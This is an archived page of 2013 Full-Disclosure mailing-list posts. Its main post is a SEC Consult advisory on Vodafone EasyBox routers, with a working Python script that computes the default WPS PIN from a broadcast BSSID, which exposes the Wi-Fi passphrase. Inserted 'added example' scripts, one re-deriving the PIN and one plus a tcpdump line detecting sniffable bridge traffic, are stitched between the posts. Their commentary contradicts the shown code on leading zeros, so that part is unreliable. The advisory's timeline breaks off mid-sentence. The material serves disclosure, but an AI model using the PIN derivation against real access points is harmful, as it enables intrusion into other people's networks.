[Full-disclosure] SEC Consult SA-20130805-0 :: Vodafone EasyBox Default WPS PIN Algorithm Weakness

2013-08-05 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================
              title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
            product: EasyBox 802 & EasyBox 803
 vulnerable version: EasyBox 802 - all versions
                     EasyBox 803 - Production date before August 2011
      fixed version: EasyBox 802 - no vendor patch available
                     EasyBox 803 - Production date after August 2011
             impact: Critical
           homepage: http://www.vodafone.de
              found: 2012-12-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.


Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS PIN is based entirely on the MAC
address (= BSSID) and the serial number of the device, and the serial number
itself is derived from the MAC address. The BSSID alone therefore determines
the default PIN.

An unauthenticated attacker within range of the access point can capture the
BSSID (e.g. from 802.11 Beacon frames) and calculate the default WPS PIN for
it. Using this PIN as an external registrar, the attacker can retrieve the
current access point configuration (including the WPA passphrase) or change
the configuration (SSID, encryption method, passphrase, ...) of the access
point.

An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.


Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

#!/usr/bin/env python3
# Vodafone EasyBox default WPS PIN derivation. The PIN depends only on the
# BSSID: the serial number used below is itself derived from the last two
# bytes of the MAC address.
import sys, re

def gen_pin(mac_str, sn):
    # one nibble per hex digit of the MAC, one digit per character of the
    # serial number; indices 0-4 of the serial (the 'R' prefix and zero
    # padding) are never used by the algorithm
    mac_int = [int(x, 16) for x in mac_str]
    sn_int = [0] * 5 + [int(x) for x in sn[5:]]
    hpin = [0] * 7

    k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
    k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
    hpin[0] = k1 ^ sn_int[9]
    hpin[1] = k1 ^ sn_int[8]
    hpin[2] = k2 ^ mac_int[9]
    hpin[3] = k2 ^ mac_int[10]
    hpin[4] = mac_int[10] ^ sn_int[9]
    hpin[5] = mac_int[11] ^ sn_int[8]
    hpin[6] = k1 ^ sn_int[7]
    # seven hex nibbles, reduced modulo 10^7 to the seven PIN digits
    pin = int('%1X%1X%1X%1X%1X%1X%1X' % tuple(hpin), 16) % 10000000

    # WPS PIN checksum - for more information see hostapd/wpa_supplicant
    # source (wps_pin_checksum) or
    # http://download.microsoft.com/download/a/f/7/afe5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
    accum = 0
    t = pin
    while t:
        accum += 3 * (t % 10)
        t //= 10
        accum += t % 10
        t //= 10
    # a WPS PIN is always 7 digits plus 1 checksum digit: keep leading zeros
    return '%07d%d' % (pin, (10 - accum % 10) % 10)

def main():
    if len(sys.argv) != 2:
        sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')

    # serial number: 'R' followed by the last two MAC bytes in decimal,
    # zero-padded so that the five significant digits sit at sn[5:]
    sn = 'R%09d' % int(mac_str[8:12], 16)
    print('derived serial number:', sn)
    print('SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],
                                                        mac_str[9], sn[5], sn[9]))
    print('WPS pin:', gen_pin(mac_str, sn))

if __name__ == '__main__':
    main()
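As an added example (not part of the SEC Consult advisory and not the script above), the check a device owner or assessor actually wants: given the BSSID and the PIN printed on the label, decide whether that PIN is the derivable default. It re-implements the derivation with the five serial digits indexed directly, keeps the leading zero of a 7-digit PIN, and validates the WPS checksum of any 8-digit PIN before comparing. The BSSIDs and label PINs in the sample are constructed test data, apart from the advisory's own usage-example BSSID.

```python
# Added example, not part of the SEC Consult advisory: is the PIN on an
# EasyBox label the derivable default? The derivation mirrors easybox_wps.py
# with the five serial digits indexed directly; wps_checksum() is the standard
# WPS PIN checksum (hostapd: wps_pin_checksum). Sample BSSIDs/label PINs are
# constructed test data, except the advisory's own usage-example BSSID.
import re


def wps_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN (digit weights 3,1,3,1,3,1,3)."""
    accum, t = 0, pin7
    while t:
        accum += 3 * (t % 10)
        t //= 10
        accum += t % 10
        t //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if pin is exactly 8 digits and its last digit is the right checksum."""
    if not re.fullmatch(r"\d{8}", pin):
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def normalize_bssid(bssid: str) -> str:
    """Strip separators; returns 12 upper-case hex digits or raises ValueError."""
    mac = re.sub(r"[^0-9a-fA-F]", "", bssid).upper()
    if len(mac) != 12:
        raise ValueError("BSSID must contain 12 hex digits: %r" % bssid)
    return mac


def easybox_default_pin(bssid: str) -> str:
    """Default WPS PIN of an affected EasyBox, computed from the BSSID alone."""
    mac = normalize_bssid(bssid)
    m = [int(c, 16) for c in mac]                  # one nibble per hex digit
    # serial digits s[0..4]: last two MAC bytes in decimal, zero-padded to 5
    s = [int(c) for c in "%05d" % int(mac[8:], 16)]
    k1 = (s[1] + s[2] + m[10] + m[11]) & 0xF
    k2 = (s[3] + s[4] + m[8] + m[9]) & 0xF
    nibbles = [k1 ^ s[4], k1 ^ s[3], k2 ^ m[9], k2 ^ m[10],
               m[10] ^ s[4], m[11] ^ s[3], k1 ^ s[2]]
    pin7 = int("".join("%X" % n for n in nibbles), 16) % 10000000
    return "%07d%d" % (pin7, wps_checksum(pin7))   # keep leading zeros


def is_default_pin(bssid: str, label_pin: str) -> bool:
    """True if the label PIN equals the derivable default, i.e. the device is exposed."""
    return wps_pin_valid(label_pin) and label_pin == easybox_default_pin(bssid)


def check_devices(devices):
    """devices: iterable of (bssid, label_pin) -> list of (bssid, label_pin, verdict)."""
    out = []
    for bssid, label_pin in devices:
        if not wps_pin_valid(label_pin):
            verdict = "not a valid WPS PIN (length or checksum)"
        elif is_default_pin(bssid, label_pin):
            verdict = "DEFAULT PIN derivable from BSSID: change PIN or disable WPS"
        else:
            verdict = "PIN not derivable from BSSID"
        out.append((bssid, label_pin, verdict))
    return out


if __name__ == "__main__":
    # constructed sample: the advisory's usage BSSID with its derived PIN, the
    # same BSSID with a non-default PIN, and a label value that is no WPS PIN
    sample = [
        ("38:22:9D:11:22:33", easybox_default_pin("38:22:9D:11:22:33")),
        ("38:22:9D:11:22:33", "12345670"),
        ("38:22:9D:11:22:34", "1234567"),
    ]
    for bssid, pin, verdict in check_devices(sample):
        print("%s  %-8s  %s" % (bssid, pin, verdict))
```

A value that fails wps_pin_valid() cannot be a WPS PIN at all, so the checksum test is a cheap first filter before a device audit or a WPS PIN attack; for the advisory's usage BSSID 38:22:9D:11:22:33 the derived default is 08413147, which the original script would print without its leading zero.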


Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011


Vendor contact timeline:

2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datensch...@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from csirt...@vodafone.com
and du-de-zv-mxl-csirt...@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
information about some newer devices which are not affected,
mentions that customers have already been notified to change
default

[Full-disclosure] [ MDVSA-2013:206 ] owncloud

2013-08-05 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:206
 http://www.mandriva.com/en/support/security/
 ___

 Package : owncloud
 Date: August 5, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated owncloud package fixes security vulnerabilities:
 
 XSS vulnerability in Share Interface (oC-SA-2013-029).
 
 Authentication bypass in user_webdavauth (oC-SA-2013-030).
 
 This update provides OwnCloud 5.0.9, which fixes these issues, as
 well as several other bugs.
 ___

 References:

 http://advisories.mageia.org/MGASA-2013-0220.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 e0002c36d706bf722fc3ea2aea7085d4  mbs1/x86_64/owncloud-5.0.9-1.1.mbs1.noarch.rpm
 2a1eb6dc1a3e554812ff9893a8ce42fa  mbs1/SRPMS/owncloud-5.0.9-1.1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFR/4EWmqjQ0CJFipgRAjr8AKC7Ra8fw9FjT5/o55ghuZK8JPl5agCgvmRG
QfXHOAlpH8rmYCJu2ibM/Ow=
=jFDE
-----END PGP SIGNATURE-----

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Potential security flaw in network implementation at Digitalocean.com

2013-08-05 Thread Johan Boger
Hi,

Today, I discovered that a certain large ISP specializing in cloud hosting (
digitalocean.com), has misconfigured their network in a way that allows for
anyone to monitor customer network traffic. Per the guidelines of
responsible disclosure, I have informed the ISP in question both when I
first noticed the issue, and also before going public with the information.
As I am sure some of this info has already trickled out (or is perhaps
already common knowledge - if so, I apologize), I feel it is paramount to
get this information out there, so that customers and others who feel this
is not something they want, can act accordingly (or at least take
counter-measures to protect their information).

What happened:

I ordered a cloud vps (a very affordable one at that, I must say) at
digitalocean.com, using the NYC node. During the process of checking MySQL
replication between master and slave, I noticed there was a lot of
background noise in tcpdump. I kept looking and when I eliminated the ports
I was using, what was left was somewhat worrying. It seems DigitalOcean
has, using KVM and libvirt per their own recognition, put the
libvirt-interface in an overly large bridge, and then kept applying more
and more networks (multiple /24, it seems). While this might be a
convenient way of assigning new networks to an ever-growing customer stock,
it also sort of turns the entire thing into an amateur radio station (using
the word amateur here to denote the activity, not the skill level of
Digitalocean staff!).

I want to make one thing clear. This is one of the better cloud shops I
have used (and I have used a lot). They seem to have excellent support,
provide what they claim to provide, and my billing there so far amounts to
less than a dollar (even though I've fiddled with lots of stuff). HOWEVER,
this does not mean that I want to be able to read what goes on with various
mail, ircd, web and Microsoft sql servers, in networks far outside of my
logical reach, as a customer with one IPv4.

I am not an angry ex-customer. I will keep using their services, if this is
fixed. Which is exactly why I am sending this email. I hope that it might
add extra motivation, before someone gets their environment hacked. The way
it is now, anyone even remotely interested, could fire up a VPS in less
than a minute, and have full sniffing capabilities with hundreds (if not
thousands) of servers. All while customers are using said servers to
develop what I can only assume is important enough to host in a cloud.

I will not paste logs as that would add nothing to my disclosure, more than
a possibility to exploit innocent users. I wish to encourage the community
to take a few steps back and not engage in target practice, while
Digitalocean undoubtedly remedies this situation (I have been in contact
with them repeatedly before coming here).

I hope that this helps, for whatever it's worth. I will happily answer any
followups, as long as they do not include requests for additional probes.
This is where my involvement ends. I leave this information in the hands of
the community, and Digitalocean (who I hope reads this list).


Best Regards,
-- 
Johan Boger
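An added example (not from Johan Boger's post) of the check that would confirm what he describes: on a correctly isolated hypervisor port, a guest capturing in promiscuous mode should only see frames addressed to its own MAC, to the broadcast address, or to a multicast group. The script below classifies raw Ethernet frames by destination and counts unicast frames destined for other hosts. The frames, MY_MAC and the foreign MACs are constructed for the example; on a real VM the frames would come from a promiscuous-mode capture (e.g. a pcap written by tcpdump), and the equivalent one-liner is `tcpdump -n -i eth0 'not ether dst <your MAC> and not ether broadcast and not ether multicast'`.

```python
# Added example, not part of the original post: detect a bridge that floods
# other hosts' unicast traffic to this VM. Frames and MACs are constructed
# sample data; MY_MAC is an assumed interface address.
import struct
from collections import Counter

ETH_HDR = struct.Struct("!6s6sH")   # dst MAC, src MAC, EtherType (big-endian)


def parse_mac(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def classify(frame: bytes, my_mac: bytes) -> str:
    """Classify one Ethernet frame by destination, from my_mac's point of view."""
    if len(frame) < ETH_HDR.size:
        return "runt"
    dst = ETH_HDR.unpack_from(frame)[0]
    if dst == my_mac:
        return "mine"
    if dst == b"\xff" * 6:
        return "broadcast"
    if dst[0] & 0x01:            # I/G bit set: multicast (ARP, IPv6 ND, mDNS ...)
        return "multicast"
    return "foreign-unicast"     # another host's traffic: should not reach this port


def audit(frames, my_mac: bytes):
    """Return (Counter of classes, set of foreign destination MACs)."""
    counts = Counter()
    foreign = set()
    for f in frames:
        c = classify(f, my_mac)
        counts[c] += 1
        if c == "foreign-unicast":
            foreign.add(mac_str(f[:6]))
    return counts, foreign


def leak_detected(frames, my_mac: str, threshold: int = 1) -> bool:
    """True if at least `threshold` foreign unicast frames were seen."""
    counts, _ = audit(frames, parse_mac(my_mac))
    return counts["foreign-unicast"] >= threshold


def build_frame(dst: str, src: str, ethertype: int = 0x0800, payload: bytes = b"") -> bytes:
    return ETH_HDR.pack(parse_mac(dst), parse_mac(src), ethertype) + payload


MY_MAC = "04:01:aa:bb:cc:01"     # assumed: this VM's own interface MAC

# constructed sample capture: one frame to us, one ARP broadcast, one IPv6
# multicast, and two unicast frames exchanged between other customers' hosts
SAMPLE_FRAMES = [
    build_frame(MY_MAC, "04:01:aa:bb:cc:02", payload=b"\x45" + b"\x00" * 19),
    build_frame("ff:ff:ff:ff:ff:ff", "04:01:aa:bb:cc:03", 0x0806),
    build_frame("33:33:00:00:00:01", "04:01:aa:bb:cc:04", 0x86dd),
    build_frame("04:01:aa:bb:cc:09", "04:01:aa:bb:cc:10"),
    build_frame("04:01:aa:bb:cc:0a", "04:01:aa:bb:cc:11"),
]

if __name__ == "__main__":
    counts, foreign = audit(SAMPLE_FRAMES, parse_mac(MY_MAC))
    print(dict(counts))
    if foreign:
        print("foreign unicast for %d other host(s): %s" % (len(foreign), sorted(foreign)))
```

A handful of foreign unicast frames is normal on any switched segment, because a switch floods frames whose destination it has not learned yet; the symptom described in the post is a sustained stream of them, spanning many hosts and subnets, which is why the check counts distinct foreign destinations rather than stopping at the first hit.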

[Full-disclosure] [SECURITY] [DSA 2734-1] wireshark security update

2013-08-05 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2734-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
August 05, 2013                        http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-4930 CVE-2013-4932 CVE-2013-4933 CVE-2013-4934 
 CVE-2013-4935

Multiple vulnerabilities were discovered in the dissectors for DVB-CI,
GSM A Common and ASN.1 PER and in the Netmon file parser.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.2.11-6+squeeze11.

For the stable distribution (wheezy), these problems have been fixed in
version 1.8.2-5wheezy5.

For the unstable distribution (sid), these problems have been fixed in
version 1.10.1-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlH/zrkACgkQXm3vHE4uylrlNgCgy3VC5Pp9JIEopwRluMPBrMi4
TX4AoIRxNZdumgDSR7dkg/HfPaMHjcFr
=kQHX
-----END PGP SIGNATURE-----
